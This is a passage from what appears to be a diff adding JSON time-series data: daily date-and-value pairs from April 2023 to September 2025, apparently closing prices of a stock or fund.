313.3026123046875 + ], + [ + "2023-04-19", + 313.1552734375 + ], + [ + "2023-04-20", + 310.7676086425781 + ], + [ + "2023-04-21", + 311.0918273925781 + ], + [ + "2023-04-24", + 310.4433288574219 + ], + [ + "2023-04-25", + 304.58721923828125 + ], + [ + "2023-04-26", + 306.43450927734375 + ], + [ + "2023-04-27", + 314.7667236328125 + ], + [ + "2023-04-28", + 316.9381408691406 + ], + [ + "2023-05-01", + 316.5745849609375 + ], + [ + "2023-05-02", + 313.8135681152344 + ], + [ + "2023-05-03", + 311.760009765625 + ], + [ + "2023-05-04", + 310.6595764160156 + ], + [ + "2023-05-05", + 317.26239013671875 + ], + [ + "2023-05-08", + 318.0484619140625 + ], + [ + "2023-05-09", + 316.0342102050781 + ], + [ + "2023-05-10", + 319.47320556640625 + ], + [ + "2023-05-11", + 320.51470947265625 + ], + [ + "2023-05-12", + 319.3650817871094 + ], + [ + "2023-05-15", + 321.094482421875 + ], + [ + "2023-05-16", + 321.45794677734375 + ], + [ + "2023-05-17", + 325.3489685058594 + ], + [ + "2023-05-18", + 331.3917236328125 + ], + [ + "2023-05-19", + 330.6449890136719 + ], + [ + "2023-05-22", + 331.7554016113281 + ], + [ + "2023-05-23", + 327.54986572265625 + ], + [ + "2023-05-24", + 325.86968994140625 + ], + [ + "2023-05-25", + 333.7991027832031 + ], + [ + "2023-05-26", + 342.32781982421875 + ], + [ + "2023-05-30", + 343.8802795410156 + ], + [ + "2023-05-31", + 341.92498779296875 + ], + [ + "2023-06-01", + 345.8749084472656 + ], + [ + "2023-06-02", + 348.4688415527344 + ], + [ + "2023-06-05", + 348.7144775390625 + ], + [ + "2023-06-06", + 348.655517578125 + ], + [ + "2023-06-07", + 342.74053955078125 + ], + [ + "2023-06-08", + 346.9950256347656 + ], + [ + "2023-06-09", + 348.32147216796875 + ], + [ + "2023-06-12", + 354.2070617675781 + ], + [ + "2023-06-13", + 356.9287414550781 + ], + [ + "2023-06-14", + 359.522705078125 + ], + [ + "2023-06-15", + 363.80682373046875 + ], + [ + "2023-06-16", + 361.5174255371094 + ], + [ + "2023-06-20", + 360.9998779296875 + ], + [ + "2023-06-21", + 356.0803527832031 + ], + [ + "2023-06-22", + 360.2816467285156 + ], + [ + "2023-06-23", + 356.7099914550781 + ], + [ + "2023-06-26", + 351.9281311035156 + ], + [ + "2023-06-27", + 357.97918701171875 + ], + [ + "2023-06-28", + 358.67779541015625 + ], + [ + "2023-06-29", + 357.9595031738281 + ], + [ + "2023-06-30", + 363.4793701171875 + ], + [ + "2023-07-03", + 364.3353271484375 + ], + [ + "2023-07-05", + 364.32550048828125 + ], + [ + "2023-07-06", + 361.5508117675781 + ], + [ + "2023-07-07", + 360.3504638671875 + ], + [ + "2023-07-10", + 360.4684753417969 + ], + [ + "2023-07-11", + 362.2494812011719 + ], + [ + "2023-07-12", + 366.82470703125 + ], + [ + "2023-07-13", + 373.0528259277344 + ], + [ + "2023-07-14", + 372.97418212890625 + ], + [ + "2023-07-17", + 376.45721435546875 + ], + [ + "2023-07-18", + 379.536865234375 + ], + [ + "2023-07-19", + 379.4483337402344 + ], + [ + "2023-07-20", + 370.7012939453125 + ], + [ + "2023-07-21", + 369.5894775390625 + ], + [ + "2023-07-24", + 370.1798400878906 + ], + [ + "2023-07-25", + 372.6888427734375 + ], + [ + "2023-07-26", + 371.4490966796875 + ], + [ + "2023-07-27", + 370.56353759765625 + ], + [ + "2023-07-28", + 377.3132629394531 + ], + [ + "2023-07-31", + 377.510009765625 + ], + [ + "2023-08-01", + 376.63433837890625 + ], + [ + "2023-08-02", + 368.36944580078125 + ], + [ + "2023-08-03", + 367.779052734375 + ], + [ + "2023-08-04", + 366.05718994140625 + ], + [ + "2023-08-07", + 369.156494140625 + ], + [ + "2023-08-08", + 366.01788330078125 + ], + [ + "2023-08-09", + 361.99359130859375 + ], + [ + "2023-08-10", + 362.6626892089844 + ], + [ + "2023-08-11", + 360.3504638671875 + ], + [ + "2023-08-14", + 364.3943786621094 + ], + [ + "2023-08-15", + 360.5276184082031 + ], + [ + "2023-08-16", + 356.7099914550781 + ], + [ + "2023-08-17", + 352.81365966796875 + ], + [ + "2023-08-18", + 352.37091064453125 + ], + [ + "2023-08-21", + 358.04815673828125 + ], + [ + "2023-08-22", + 357.5364685058594 + ], + [ + "2023-08-23", + 363.1742858886719 + ], + [ + "2023-08-24", + 355.41119384765625 + ], + [ + "2023-08-25", + 358.1661682128906 + ], + [ + "2023-08-28", + 360.8620910644531 + ], + [ + "2023-08-29", + 368.7432556152344 + ], + [ + "2023-08-30", + 370.7997131347656 + ], + [ + "2023-08-31", + 371.91156005859375 + ], + [ + "2023-09-01", + 371.5179443359375 + ], + [ + "2023-09-05", + 371.990234375 + ], + [ + "2023-09-06", + 368.71380615234375 + ], + [ + "2023-09-07", + 366.0768737792969 + ], + [ + "2023-09-08", + 366.5885009765625 + ], + [ + "2023-09-11", + 370.9078674316406 + ], + [ + "2023-09-12", + 366.7951354980469 + ], + [ + "2023-09-13", + 368.1922302246094 + ], + [ + "2023-09-14", + 371.2030944824219 + ], + [ + "2023-09-15", + 364.84698486328125 + ], + [ + "2023-09-18", + 365.227294921875 + ], + [ + "2023-09-19", + 364.44891357421875 + ], + [ + "2023-09-20", + 359.197021484375 + ], + [ + "2023-09-21", + 352.6148986816406 + ], + [ + "2023-09-22", + 352.66424560546875 + ], + [ + "2023-09-25", + 354.3392639160156 + ], + [ + "2023-09-26", + 349.0184326171875 + ], + [ + "2023-09-27", + 349.8362121582031 + ], + [ + "2023-09-28", + 352.76275634765625 + ], + [ + "2023-09-29", + 353.0189208984375 + ], + [ + "2023-10-02", + 355.9651184082031 + ], + [ + "2023-10-03", + 349.71807861328125 + ], + [ + "2023-10-04", + 354.47723388671875 + ], + [ + "2023-10-05", + 353.4327697753906 + ], + [ + "2023-10-06", + 359.3547058105469 + ], + [ + "2023-10-09", + 361.1874084472656 + ], + [ + "2023-10-10", + 363.1876220703125 + ], + [ + "2023-10-11", + 365.77911376953125 + ], + [ + "2023-10-12", + 364.50799560546875 + ], + [ + "2023-10-13", + 359.9261474609375 + ], + [ + "2023-10-16", + 363.9956359863281 + ], + [ + "2023-10-17", + 362.80340576171875 + ], + [ + "2023-10-18", + 358.0442199707031 + ], + [ + "2023-10-19", + 354.6940002441406 + ], + [ + "2023-10-20", + 349.4027404785156 + ], + [ + "2023-10-23", + 350.45703125 + ], + [ + "2023-10-24", + 353.8663330078125 + ], + [ + "2023-10-25", + 345.2051696777344 + ], + [ + "2023-10-26", + 338.623046875 + ], + [ + "2023-10-27", + 340.24896240234375 + ], + [ + "2023-10-30", + 344.08184814453125 + ], + [ + "2023-10-31", + 345.72735595703125 + ], + [ + "2023-11-01", + 351.7281188964844 + ], + [ + "2023-11-02", + 358.1131286621094 + ], + [ + "2023-11-03", + 362.320556640625 + ], + [ + "2023-11-06", + 363.798583984375 + ], + [ + "2023-11-07", + 367.2374572753906 + ], + [ + "2023-11-08", + 367.47393798828125 + ], + [ + "2023-11-09", + 364.6460266113281 + ], + [ + "2023-11-10", + 372.84405517578125 + ], + [ + "2023-11-13", + 371.6813049316406 + ], + [ + "2023-11-14", + 379.6823425292969 + ], + [ + "2023-11-15", + 379.9681091308594 + ], + [ + "2023-11-16", + 380.2932434082031 + ], + [ + "2023-11-17", + 380.38189697265625 + ], + [ + "2023-11-20", + 385.01300048828125 + ], + [ + "2023-11-21", + 382.77630615234375 + ], + [ + "2023-11-22", + 384.343017578125 + ], + [ + "2023-11-24", + 383.801025390625 + ], + [ + "2023-11-27", + 383.4660339355469 + ], + [ + "2023-11-28", + 384.4710998535156 + ], + [ + "2023-11-29", + 384.09661865234375 + ], + [ + "2023-11-30", + 383.1310119628906 + ], + [ + "2023-12-01", + 384.2247619628906 + ], + [ + "2023-12-04", + 380.6578369140625 + ], + [ + "2023-12-05", + 381.61358642578125 + ], + [ + "2023-12-06", + 379.4063720703125 + ], + [ + "2023-12-07", + 384.70758056640625 + ], + [ + "2023-12-08", + 386.4220886230469 + ], + [ + "2023-12-11", + 389.7229309082031 + ], + [ + "2023-12-12", + 392.8267822265625 + ], + [ + "2023-12-13", + 397.822509765625 + ], + [ + "2023-12-14", + 397.4776611328125 + ], + [ + "2023-12-15", + 399.3990173339844 + ], + [ + "2023-12-18", + 401.91473388671875 + ], + [ + "2023-12-19", + 403.9682922363281 + ], + [ + "2023-12-20", + 397.9654541015625 + ], + [ + "2023-12-21", + 402.5959777832031 + ], + [ + "2023-12-22", + 403.19818115234375 + ], + [ + "2023-12-26", + 405.6664733886719 + ], + [ + "2023-12-27", + 406.4922790527344 + ], + [ + "2023-12-28", + 406.29473876953125 + ], + [ + "2023-12-29", + 404.5363464355469 + ], + [ + "2024-01-02", + 397.6907653808594 + ], + [ + "2024-01-03", + 393.4825744628906 + ], + [ + "2024-01-04", + 391.45758056640625 + ], + [ + "2024-01-05", + 391.92181396484375 + ], + [ + "2024-01-08", + 400.0220642089844 + ], + [ + "2024-01-09", + 400.81231689453125 + ], + [ + "2024-01-10", + 403.5288391113281 + ], + [ + "2024-01-11", + 404.36846923828125 + ], + [ + "2024-01-12", + 404.575927734375 + ], + [ + "2024-01-16", + 404.5363464355469 + ], + [ + "2024-01-17", + 402.2544860839844 + ], + [ + "2024-01-18", + 407.96417236328125 + ], + [ + "2024-01-19", + 416.0545349121094 + ], + [ + "2024-01-22", + 416.5978088378906 + ], + [ + "2024-01-23", + 418.3265686035156 + ], + [ + "2024-01-24", + 420.6479187011719 + ], + [ + "2024-01-25", + 421.1616516113281 + ], + [ + "2024-01-26", + 418.65252685546875 + ], + [ + "2024-01-29", + 422.939697265625 + ], + [ + "2024-01-30", + 420.1243896484375 + ], + [ + "2024-01-31", + 411.8957214355469 + ], + [ + "2024-02-01", + 416.74603271484375 + ], + [ + "2024-02-02", + 423.78924560546875 + ], + [ + "2024-02-05", + 423.2361145019531 + ], + [ + "2024-02-06", + 422.3865051269531 + ], + [ + "2024-02-07", + 426.7329406738281 + ], + [ + "2024-02-08", + 427.5232849121094 + ], + [ + "2024-02-09", + 431.73138427734375 + ], + [ + "2024-02-12", + 430.0422058105469 + ], + [ + "2024-02-13", + 423.3348693847656 + ], + [ + "2024-02-14", + 427.9480285644531 + ], + [ + "2024-02-15", + 429.2223205566406 + ], + [ + "2024-02-16", + 425.3302917480469 + ], + [ + "2024-02-20", + 422.11981201171875 + ], + [ + "2024-02-21", + 420.4305725097656 + ], + [ + "2024-02-22", + 432.7390441894531 + ], + [ + "2024-02-23", + 431.46466064453125 + ], + [ + "2024-02-26", + 431.23748779296875 + ], + [ + "2024-02-27", + 432.2746887207031 + ], + [ + "2024-02-28", + 429.9730529785156 + ], + [ + "2024-02-29", + 433.65771484375 + ], + [ + "2024-03-01", + 440.18719482421875 + ], + [ + "2024-03-04", + 438.6165771484375 + ], + [ + "2024-03-05", + 430.74359130859375 + ], + [ + "2024-03-06", + 433.45025634765625 + ], + [ + "2024-03-07", + 440.0292053222656 + ], + [ + "2024-03-08", + 433.67742919921875 + ], + [ + "2024-03-11", + 432.0672912597656 + ], + [ + "2024-03-12", + 438.2609558105469 + ], + [ + "2024-03-13", + 434.89239501953125 + ], + [ + "2024-03-14", + 433.7959899902344 + ], + [ + "2024-03-15", + 428.6394958496094 + ], + [ + "2024-03-18", + 432.7276306152344 + ], + [ + "2024-03-19", + 433.8057861328125 + ], + [ + "2024-03-20", + 438.9492492675781 + ], + [ + "2024-03-21", + 441.0264587402344 + ], + [ + "2024-03-22", + 441.5309753417969 + ], + [ + "2024-03-25", + 439.92852783203125 + ], + [ + "2024-03-26", + 438.5041198730469 + ], + [ + "2024-03-27", + 439.9976806640625 + ], + [ + "2024-03-28", + 439.1866760253906 + ], + [ + "2024-04-01", + 440.1164855957031 + ], + [ + "2024-04-02", + 436.3181457519531 + ], + [ + "2024-04-03", + 437.29742431640625 + ], + [ + "2024-04-04", + 430.61083984375 + ], + [ + "2024-04-05", + 435.68505859375 + ], + [ + "2024-04-08", + 435.813720703125 + ], + [ + "2024-04-09", + 437.426025390625 + ], + [ + "2024-04-10", + 433.60791015625 + ], + [ + "2024-04-11", + 440.5318908691406 + ], + [ + "2024-04-12", + 433.509033203125 + ], + [ + "2024-04-15", + 426.3773498535156 + ], + [ + "2024-04-16", + 426.4169006347656 + ], + [ + "2024-04-17", + 421.2140197753906 + ], + [ + "2024-04-18", + 418.8103942871094 + ], + [ + "2024-04-19", + 410.1456298828125 + ], + [ + "2024-04-22", + 414.2702941894531 + ], + [ + "2024-04-23", + 420.4524230957031 + ], + [ + "2024-04-24", + 421.8768005371094 + ], + [ + "2024-04-25", + 419.8392028808594 + ], + [ + "2024-04-26", + 426.3179931640625 + ], + [ + "2024-04-29", + 428.0489807128906 + ], + [ + "2024-04-30", + 419.9776306152344 + ], + [ + "2024-05-01", + 416.94097900390625 + ], + [ + "2024-05-02", + 422.26251220703125 + ], + [ + "2024-05-03", + 430.74932861328125 + ], + [ + "2024-05-06", + 435.46746826171875 + ], + [ + "2024-05-07", + 435.5367736816406 + ], + [ + "2024-05-08", + 435.2795715332031 + ], + [ + "2024-05-09", + 436.2291564941406 + ], + [ + "2024-05-10", + 437.2578430175781 + ], + [ + "2024-05-13", + 438.26678466796875 + ], + [ + "2024-05-14", + 441.0857849121094 + ], + [ + "2024-05-15", + 447.9801025390625 + ], + [ + "2024-05-16", + 447.0700988769531 + ], + [ + "2024-05-17", + 446.8524475097656 + ], + [ + "2024-05-20", + 449.9682922363281 + ], + [ + "2024-05-21", + 450.84857177734375 + ], + [ + "2024-05-22", + 450.75958251953125 + ], + [ + "2024-05-23", + 448.7318420410156 + ], + [ + "2024-05-24", + 452.9752197265625 + ], + [ + "2024-05-28", + 454.6864013671875 + ], + [ + "2024-05-29", + 451.48162841796875 + ], + [ + "2024-05-30", + 446.64471435546875 + ], + [ + "2024-05-31", + 445.8138732910156 + ], + [ + "2024-06-03", + 448.2076110839844 + ], + [ + "2024-06-04", + 449.43414306640625 + ], + [ + "2024-06-05", + 458.49462890625 + ], + [ + "2024-06-06", + 458.3363952636719 + ], + [ + "2024-06-07", + 457.9308166503906 + ], + [ + "2024-06-10", + 459.7804870605469 + ], + [ + "2024-06-11", + 462.9358215332031 + ], + [ + "2024-06-12", + 468.9992370605469 + ], + [ + "2024-06-13", + 471.54132080078125 + ], + [ + "2024-06-14", + 473.9844970703125 + ], + [ + "2024-06-17", + 479.79071044921875 + ], + [ + "2024-06-18", + 479.9391174316406 + ], + [ + "2024-06-20", + 476.23974609375 + ], + [ + "2024-06-21", + 474.9637451171875 + ], + [ + "2024-06-24", + 469.5564270019531 + ], + [ + "2024-06-25", + 474.92608642578125 + ], + [ + "2024-06-26", + 475.90692138671875 + ], + [ + "2024-06-27", + 477.1353759765625 + ], + [ + "2024-06-28", + 474.6585998535156 + ], + [ + "2024-07-01", + 477.4425354003906 + ], + [ + "2024-07-02", + 482.45550537109375 + ], + [ + "2024-07-03", + 486.477783203125 + ], + [ + "2024-07-05", + 491.55023193359375 + ], + [ + "2024-07-08", + 492.7192077636719 + ], + [ + "2024-07-09", + 493.1452331542969 + ], + [ + "2024-07-10", + 498.2869873046875 + ], + [ + "2024-07-11", + 487.3595275878906 + ], + [ + "2024-07-12", + 490.22265625 + ], + [ + "2024-07-15", + 491.5402526855469 + ], + [ + "2024-07-16", + 491.7284851074219 + ], + [ + "2024-07-17", + 477.29388427734375 + ], + [ + "2024-07-18", + 475.0350341796875 + ], + [ + "2024-07-19", + 470.8245544433594 + ], + [ + "2024-07-22", + 477.8388366699219 + ], + [ + "2024-07-23", + 476.1545715332031 + ], + [ + "2024-07-24", + 459.0747375488281 + ], + [ + "2024-07-25", + 454.0121765136719 + ], + [ + "2024-07-26", + 458.6686096191406 + ], + [ + "2024-07-29", + 459.58990478515625 + ], + [ + "2024-07-30", + 453.27911376953125 + ], + [ + "2024-07-31", + 466.69329833984375 + ], + [ + "2024-08-01", + 455.38934326171875 + ], + [ + "2024-08-02", + 444.5806884765625 + ], + [ + "2024-08-05", + 431.32501220703125 + ], + [ + "2024-08-06", + 435.4463195800781 + ], + [ + "2024-08-07", + 430.7305603027344 + ], + [ + "2024-08-08", + 443.906982421875 + ], + [ + "2024-08-09", + 446.22528076171875 + ], + [ + "2024-08-12", + 447.1862487792969 + ], + [ + "2024-08-13", + 458.28216552734375 + ], + [ + "2024-08-14", + 458.43084716796875 + ], + [ + "2024-08-15", + 470.0121765136719 + ], + [ + "2024-08-16", + 470.6164855957031 + ], + [ + "2024-08-19", + 476.79852294921875 + ], + [ + "2024-08-20", + 475.79791259765625 + ], + [ + "2024-08-21", + 478.01708984375 + ], + [ + "2024-08-22", + 470.438232421875 + ], + [ + "2024-08-23", + 475.5403747558594 + ], + [ + "2024-08-26", + 470.92364501953125 + ], + [ + "2024-08-27", + 472.3304748535156 + ], + [ + "2024-08-28", + 466.970703125 + ], + [ + "2024-08-29", + 466.2871398925781 + ], + [ + "2024-08-30", + 471.8450012207031 + ], + [ + "2024-09-03", + 457.5193786621094 + ], + [ + "2024-09-04", + 456.3304748535156 + ], + [ + "2024-09-05", + 456.75653076171875 + ], + [ + "2024-09-06", + 444.521240234375 + ], + [ + "2024-09-09", + 450.23760986328125 + ], + [ + "2024-09-10", + 454.3985900878906 + ], + [ + "2024-09-11", + 464.26605224609375 + ], + [ + "2024-09-12", + 468.8233947753906 + ], + [ + "2024-09-13", + 470.92364501953125 + ], + [ + "2024-09-16", + 468.8431701660156 + ], + [ + "2024-09-17", + 469.0908508300781 + ], + [ + "2024-09-18", + 467.05987548828125 + ], + [ + "2024-09-19", + 478.86907958984375 + ], + [ + "2024-09-20", + 477.9576416015625 + ], + [ + "2024-09-23", + 479.224609375 + ], + [ + "2024-09-24", + 481.53619384765625 + ], + [ + "2024-09-25", + 481.9826354980469 + ], + [ + "2024-09-26", + 485.6037902832031 + ], + [ + "2024-09-27", + 482.9053039550781 + ], + [ + "2024-09-30", + 484.21484375 + ], + [ + "2024-10-01", + 477.4685363769531 + ], + [ + "2024-10-02", + 478.1432189941406 + ], + [ + "2024-10-03", + 477.7860412597656 + ], + [ + "2024-10-04", + 483.47076416015625 + ], + [ + "2024-10-07", + 478.2920227050781 + ], + [ + "2024-10-08", + 485.43511962890625 + ], + [ + "2024-10-09", + 489.2547302246094 + ], + [ + "2024-10-10", + 488.6991882324219 + ], + [ + "2024-10-11", + 489.4630432128906 + ], + [ + "2024-10-14", + 493.57037353515625 + ], + [ + "2024-10-15", + 486.972900390625 + ], + [ + "2024-10-16", + 487.0324401855469 + ], + [ + "2024-10-17", + 487.3697509765625 + ], + [ + "2024-10-18", + 490.5643005371094 + ], + [ + "2024-10-21", + 491.5068054199219 + ], + [ + "2024-10-22", + 492.0425109863281 + ], + [ + "2024-10-23", + 484.5025329589844 + ], + [ + "2024-10-24", + 488.4313049316406 + ], + [ + "2024-10-25", + 491.4075622558594 + ], + [ + "2024-10-28", + 491.4869689941406 + ], + [ + "2024-10-29", + 496.2093505859375 + ], + [ + "2024-10-30", + 492.4592590332031 + ], + [ + "2024-10-31", + 480.0281982421875 + ], + [ + "2024-11-01", + 483.57989501953125 + ], + [ + "2024-11-04", + 482.171142578125 + ], + [ + "2024-11-05", + 488.3221435546875 + ], + [ + "2024-11-06", + 501.5865478515625 + ], + [ + "2024-11-07", + 509.48358154296875 + ], + [ + "2024-11-08", + 510.07891845703125 + ], + [ + "2024-11-11", + 509.78131103515625 + ], + [ + "2024-11-12", + 508.8586120605469 + ], + [ + "2024-11-13", + 508.203857421875 + ], + [ + "2024-11-14", + 504.6719970703125 + ], + [ + "2024-11-15", + 492.6477355957031 + ], + [ + "2024-11-18", + 496.0704650878906 + ], + [ + "2024-11-19", + 499.4833068847656 + ], + [ + "2024-11-20", + 499.1955871582031 + ], + [ + "2024-11-21", + 500.99127197265625 + ], + [ + "2024-11-22", + 501.7948913574219 + ], + [ + "2024-11-25", + 502.5885314941406 + ], + [ + "2024-11-26", + 505.28704833984375 + ], + [ + "2024-11-27", + 501.3087463378906 + ], + [ + "2024-11-29", + 505.7136535644531 + ], + [ + "2024-12-02", + 511.21978759765625 + ], + [ + "2024-12-03", + 512.787353515625 + ], + [ + "2024-12-04", + 519.126953125 + ], + [ + "2024-12-05", + 517.6883544921875 + ], + [ + "2024-12-06", + 522.3214111328125 + ], + [ + "2024-12-09", + 518.2537841796875 + ], + [ + "2024-12-10", + 516.4879150390625 + ], + [ + "2024-12-11", + 525.7342529296875 + ], + [ + "2024-12-12", + 522.3413696289062 + ], + [ + "2024-12-13", + 526.3395385742188 + ], + [ + "2024-12-16", + 533.9191284179688 + ], + [ + "2024-12-17", + 531.5678100585938 + ], + [ + "2024-12-18", + 512.3905029296875 + ], + [ + "2024-12-19", + 510.10870361328125 + ], + [ + "2024-12-20", + 514.5631713867188 + ], + [ + "2024-12-23", + 519.5764770507812 + ], + [ + "2024-12-24", + 526.621826171875 + ], + [ + "2024-12-26", + 526.2639770507812 + ], + [ + "2024-12-27", + 519.2683715820312 + ], + [ + "2024-12-30", + 512.3621215820312 + ], + [ + "2024-12-31", + 508.0097961425781 + ], + [ + "2025-01-02", + 507.01611328125 + ], + [ + "2025-01-03", + 515.3135375976562 + ], + [ + "2025-01-06", + 521.2359008789062 + ], + [ + "2025-01-07", + 511.9348449707031 + ], + [ + "2025-01-08", + 512.0242919921875 + ], + [ + "2025-01-10", + 503.9952392578125 + ], + [ + "2025-01-13", + 502.37548828125 + ], + [ + "2025-01-14", + 501.89849853515625 + ], + [ + "2025-01-15", + 513.4453735351562 + ], + [ + "2025-01-16", + 509.84814453125 + ], + [ + "2025-01-17", + 518.4535522460938 + ], + [ + "2025-01-21", + 521.4943237304688 + ], + [ + "2025-01-22", + 528.1620483398438 + ], + [ + "2025-01-23", + 529.284912109375 + ], + [ + "2025-01-24", + 526.2938842773438 + ], + [ + "2025-01-27", + 510.9710693359375 + ], + [ + "2025-01-28", + 518.5231323242188 + ], + [ + "2025-01-29", + 517.54931640625 + ], + [ + "2025-01-30", + 519.7552490234375 + ], + [ + "2025-01-31", + 519.0000610351562 + ], + [ + "2025-02-03", + 514.8463745117188 + ], + [ + "2025-02-04", + 521.1663818359375 + ], + [ + "2025-02-05", + 523.5313720703125 + ], + [ + "2025-02-06", + 526.2639770507812 + ], + [ + "2025-02-07", + 519.6260986328125 + ], + [ + "2025-02-10", + 525.9161987304688 + ], + [ + "2025-02-11", + 524.6641845703125 + ], + [ + "2025-02-12", + 524.9722900390625 + ], + [ + "2025-02-13", + 532.5243530273438 + ], + [ + "2025-02-14", + 534.7601928710938 + ], + [ + "2025-02-18", + 535.9724731445312 + ], + [ + "2025-02-19", + 536.1216430664062 + ], + [ + "2025-02-20", + 533.845947265625 + ], + [ + "2025-02-21", + 522.766357421875 + ], + [ + "2025-02-24", + 516.5952758789062 + ], + [ + "2025-02-25", + 510.0865783691406 + ], + [ + "2025-02-26", + 511.3187561035156 + ], + [ + "2025-02-27", + 497.1188049316406 + ], + [ + "2025-02-28", + 504.9691162109375 + ], + [ + "2025-03-03", + 493.9190673828125 + ], + [ + "2025-03-04", + 492.42852783203125 + ], + [ + "2025-03-05", + 498.84783935546875 + ], + [ + "2025-03-06", + 485.1248779296875 + ], + [ + "2025-03-07", + 488.6922302246094 + ], + [ + "2025-03-10", + 469.7522888183594 + ], + [ + "2025-03-11", + 468.6294250488281 + ], + [ + "2025-03-12", + 473.9159240722656 + ], + [ + "2025-03-13", + 465.3899230957031 + ], + [ + "2025-03-14", + 476.6386413574219 + ], + [ + "2025-03-17", + 479.72900390625 + ], + [ + "2025-03-18", + 471.5509033203125 + ], + [ + "2025-03-19", + 477.86090087890625 + ], + [ + "2025-03-20", + 476.2411804199219 + ], + [ + "2025-03-21", + 477.8111877441406 + ], + [ + "2025-03-24", + 488.2964172363281 + ], + [ + "2025-03-25", + 491.08294677734375 + ], + [ + "2025-03-26", + 482.0466613769531 + ], + [ + "2025-03-27", + 479.29998779296875 + ], + [ + "2025-03-28", + 466.6810607910156 + ], + [ + "2025-03-31", + 466.66119384765625 + ], + [ + "2025-04-01", + 470.4229736328125 + ], + [ + "2025-04-02", + 473.8563232421875 + ], + [ + "2025-04-03", + 448.4891357421875 + ], + [ + "2025-04-04", + 420.63397216796875 + ], + [ + "2025-04-07", + 421.6490478515625 + ], + [ + "2025-04-08", + 414.0557861328125 + ], + [ + "2025-04-09", + 463.7552490234375 + ], + [ + "2025-04-10", + 444.0306701660156 + ], + [ + "2025-04-11", + 452.2110900878906 + ], + [ + "2025-04-14", + 455.2762451171875 + ], + [ + "2025-04-15", + 455.7837829589844 + ], + [ + "2025-04-16", + 442.04034423828125 + ], + [ + "2025-04-17", + 441.9607238769531 + ], + [ + "2025-04-21", + 431.0236511230469 + ], + [ + "2025-04-22", + 442.3388977050781 + ], + [ + "2025-04-23", + 452.37030029296875 + ], + [ + "2025-04-24", + 465.0987243652344 + ], + [ + "2025-04-25", + 470.2835998535156 + ], + [ + "2025-04-28", + 470.1343688964844 + ], + [ + "2025-04-29", + 473.23931884765625 + ], + [ + "2025-04-30", + 473.17962646484375 + ], + [ + "2025-05-01", + 479.35968017578125 + ], + [ + "2025-05-02", + 486.4752502441406 + ], + [ + "2025-05-05", + 483.5892028808594 + ], + [ + "2025-05-06", + 479.09100341796875 + ], + [ + "2025-05-07", + 480.97186279296875 + ], + [ + "2025-05-08", + 485.9378967285156 + ], + [ + "2025-05-09", + 485.619384765625 + ], + [ + "2025-05-12", + 505.4036560058594 + ], + [ + "2025-05-13", + 513.1064453125 + ], + [ + "2025-05-14", + 516.1814575195312 + ], + [ + "2025-05-15", + 516.7486572265625 + ], + [ + "2025-05-16", + 518.9978637695312 + ], + [ + "2025-05-19", + 519.4954223632812 + ], + [ + "2025-05-20", + 517.7637939453125 + ], + [ + "2025-05-21", + 510.5685729980469 + ], + [ + "2025-05-22", + 511.5240173339844 + ], + [ + "2025-05-23", + 506.7868957519531 + ], + [ + "2025-05-27", + 518.709228515625 + ], + [ + "2025-05-28", + 516.4102783203125 + ], + [ + "2025-05-29", + 517.4254150390625 + ], + [ + "2025-05-30", + 516.609375 + ], + [ + "2025-06-02", + 520.6896362304688 + ], + [ + "2025-06-03", + 524.7599487304688 + ], + [ + "2025-06-04", + 526.2228393554688 + ], + [ + "2025-06-05", + 522.261962890625 + ], + [ + "2025-06-06", + 527.3673095703125 + ], + [ + "2025-06-09", + 528.1436157226562 + ], + [ + "2025-06-10", + 531.6365966796875 + ], + [ + "2025-06-11", + 529.84521484375 + ], + [ + "2025-06-12", + 531.0892944335938 + ], + [ + "2025-06-13", + 524.421630859375 + ], + [ + "2025-06-16", + 531.71630859375 + ], + [ + "2025-06-17", + 526.5313720703125 + ], + [ + "2025-06-18", + 526.4417724609375 + ], + [ + "2025-06-20", + 524.292236328125 + ], + [ + "2025-06-23", + 529.6832275390625 + ], + [ + "2025-06-24", + 537.7831420898438 + ], + [ + "2025-06-25", + 539.157958984375 + ], + [ + "2025-06-26", + 544.1992797851562 + ], + [ + "2025-06-27", + 546.0623779296875 + ], + [ + "2025-06-30", + 549.5992431640625 + ], + [ + "2025-07-01", + 544.9664306640625 + ], + [ + "2025-07-02", + 548.7623291015625 + ], + [ + "2025-07-03", + 554.1622314453125 + ], + [ + "2025-07-07", + 549.9878540039062 + ], + [ + "2025-07-08", + 550.2966918945312 + ], + [ + "2025-07-09", + 554.1921997070312 + ], + [ + "2025-07-10", + 553.3951416015625 + ], + [ + "2025-07-11", + 552.1497802734375 + ], + [ + "2025-07-14", + 554.1524047851562 + ], + [ + "2025-07-15", + 554.660400390625 + ], + [ + "2025-07-16", + 555.228271484375 + ], + [ + "2025-07-17", + 559.7216186523438 + ], + [ + "2025-07-18", + 559.1836547851562 + ], + [ + "2025-07-21", + 562.0828857421875 + ], + [ + "2025-07-22", + 559.1737060546875 + ], + [ + "2025-07-23", + 561.7242431640625 + ], + [ + "2025-07-24", + 562.9197387695312 + ], + [ + "2025-07-25", + 564.2747192382812 + ], + [ + "2025-07-28", + 566.0382080078125 + ], + [ + "2025-07-29", + 565.1614990234375 + ], + [ + "2025-07-30", + 565.9186401367188 + ], + [ + "2025-07-31", + 562.9197387695312 + ], + [ + "2025-08-01", + 551.8309936523438 + ], + [ + "2025-08-04", + 562.0131225585938 + ], + [ + "2025-08-05", + 558.1973266601562 + ], + [ + "2025-08-06", + 565.2212524414062 + ], + [ + "2025-08-07", + 567.1340942382812 + ], + [ + "2025-08-08", + 572.4244995117188 + ], + [ + "2025-08-11", + 570.7307739257812 + ], + [ + "2025-08-12", + 577.904052734375 + ], + [ + "2025-08-13", + 578.1930541992188 + ], + [ + "2025-08-14", + 577.7448120117188 + ], + [ + "2025-08-15", + 575.2041625976562 + ], + [ + "2025-08-18", + 574.9749755859375 + ], + [ + "2025-08-19", + 567.1739501953125 + ], + [ + "2025-08-20", + 563.8065185546875 + ], + [ + "2025-08-21", + 561.1962280273438 + ], + [ + "2025-08-22", + 569.85400390625 + ], + [ + "2025-08-25", + 568.2101440429688 + ], + [ + "2025-08-26", + 570.4916381835938 + ], + [ + "2025-08-27", + 571.3684692382812 + ], + [ + "2025-08-28", + 574.9451904296875 + ], + [ + "2025-08-29", + 568.2898559570312 + ], + [ + "2025-09-02", + 563.527587890625 + ], + [ + "2025-09-03", + 567.9610595703125 + ], + [ + "2025-09-04", + 573.1019897460938 + ], + [ + "2025-09-05", + 573.9288940429688 + ], + [ + "2025-09-08", + 576.728515625 + ], + [ + "2025-09-09", + 578.3624877929688 + ], + [ + "2025-09-10", + 578.5517578125 + ], + [ + "2025-09-11", + 581.919189453125 + ], + [ + "2025-09-12", + 584.4896240234375 